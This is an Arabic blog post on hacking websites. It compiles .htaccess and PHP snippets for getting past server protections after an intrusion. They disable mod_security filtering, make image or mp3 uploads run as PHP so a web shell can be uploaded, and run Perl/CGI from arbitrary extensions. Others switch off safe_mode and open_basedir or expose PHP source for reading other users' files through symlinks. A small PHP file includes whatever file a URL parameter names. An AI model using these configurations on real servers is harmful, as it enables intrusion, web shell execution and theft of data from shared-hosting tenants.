تخطي جميع الحمايات ب واسطة ملف htaccess

1

يعد ملف .htaccess في موقع الويب قويًا و  يتحكم في التكوين عالي المستوى لموقع الويب الخاص بك. على الخوادم التي تشغل Apache (برنامج خادم ويب) ، يسمح لك ملف .htaccess بإجراء تغييرات على تكوين موقع الويب الخاص بك دون الحاجة إلى تعديل ملفات تكوين الخادم.

htaccess شرح
htaccess شرح

في هذا الدليل الخاص بملف .htacess ، نجيب على ماهية ملف .htaccess ، وكيفية استخدام ملف .htaccess وكيفية تحديد موقعه على خادمك ، والمزيد.

أين يوجد ملف .htaccess؟

يتم تكوين Apache (البرنامج الذي يشغل خادم الويب الخاص بك) بحيث يتم إخفاء جميع الملفات المسماة .htaccess. لماذا ا؟ تحتوي الملفات على معلومات تكوين مهمة ويمكن استخدامها لتهديد الخادم الخاص بك.

على الرغم من أن الملف مخفي ، فإن موقع ملف .htaccess هو الأكثر شيوعًا في مجلد public_html بموقعك على الويب.

htaccess
htaccess


 و في هده التدوينة المتواضعة سوف نتكلم على احد اهم و ابرز الموضوغات الشيقة في عالم اختراق المواقع و الا و هي تخطي الحمايات في اختراق السيرفرات عن طريق ملف htaccess ف قمت ب جمع ابرز الكودات التي انت ب حاجة اليها في عمليات تخطي الحمايات 
تابع معي

التحكم باصدار php

كود : 

AddType application/x-httpd-php4 .php


تتغير امتداد او لاحقة php الى امتداد gif,jpg

AddType application/x-httpd-php .gif AddType application/x-httpd-php .jpg


تحكم بcgi-s cript ولاحقاته وتشغيلها

AddHandler cgi-s cript .pp .pl .txt


تخطي الـ LiteSpeed

<Files *.php> ForceType application/x-httpd-php4 </Files> <ifModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>  

تخطي السيف مود safe_mode بحالة Suexec

suPHP_ConfigPath /home/user/public_html/php.ini


تخطي الفور بدن Forbidden

1  

Options FollowSymLinks MultiViews Indexes ExecCGI

2

Options Indexes FollowSymLinks  DirectoryIndex ssssss.htm  AddType txt .php  AddHandler txt .php  

3

 Options All DirectoryIndex ssss.html  addType txt .php  AddHandler txt .php    <IfModule mod_security.c>     SecFilterEngine Off     SecFilterScanPOST Off </IfModule> 

4

Options All ReadMeName 1.txt

5

suPHP_ConfigPath /home/user/public_html/php.ini

6

Options all Options +FollowSymLinks DirectoryIndex Sux.html Options +Indexes AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html 

7

Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php <IfModule mod_autoindex.c>  IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble  </ifModule> <IfModule mod_security.c>  SecFilterEngine Off  SecFilterScanPOST Off  </IfModule> 

تخطي انترنت سيرفر ارور  HTTP 500 Internal Server Error

<IfModule mod_security.c>     SecFilterEngine Off     SecFilterScanPOST Off </IfModule>

تخطي مراكز التحميل رفع الشل باي امتداد

<FilesMatch "^.*.mp3">    SetHandler application/x-httpd-php </FilesMatch>  

تشغيل البيرل باي امتداد

AddHandler cgi-script .CH AddHandler cgi-script .txt AddHandler cgi-script .pp AddHandler cgi-script .pl

تشغيل البيرل وملفات السي جي اذا كان محمي منhttp.conf ببعض اضافة لاحقاته المعروفة pl,cgi

Options ExecCGI AddType application/x-httpd-cgi .xx AddHandler cgi-s cript .xx

تشغيل او تعطيل register_globals

php_flag register_globals "off"

تعطيل المود السيكيورتي

<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>

تعطيل او تشغيل open_basedir

php_flag open_basedir "off"

تغير اصدار ال php

AddType application/x-httpd-php4 .php

سحب ملف بصلاحيه يوزر

AddType text/plain .php Options +Indexes DirectoryIndex filename.html

سماح و تشغيل الكل 

Options All

عرض وسماح لملفات الاختصار symlinks

Options FollowSymLinks

و الان الشيء المهم جدا 
و هو تخطي السيف مود safe_mode

قم ب انشاء او تعديل ملف ب اسم  ini.php
و ضع هادا الكود 

 echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GETsansursansursansur91;"file"sansursansursansur93;); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GETsansursansursansur91;"ss"sansursansursansur93;); ?>

و الان قم ب انشاء ملف ب اسم php.ini او ابحث عليه و قم ب التعديل عليه 
ضع هادا الكود 

 safe_mode = off

تخطي SymLinks

Options +FollowSymLinks DirectoryIndex Index.html Options +Indexes AddType text/plain .php AddHandler server-parsed .php

تخطي SymLinks   بقوة 

Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php

في الاخير اتمنى انكم قد استفدتم من هده المدونة المتواضعة و المتعوب عليها في التجميع 😉😉😉😉

السابق1 of 2

1 Comment
  1. Kader Saada says

    مدومة ما شاء الله و قد استفدنا منها الكثير و الكثير

Leave A Reply

Your email address will not be published.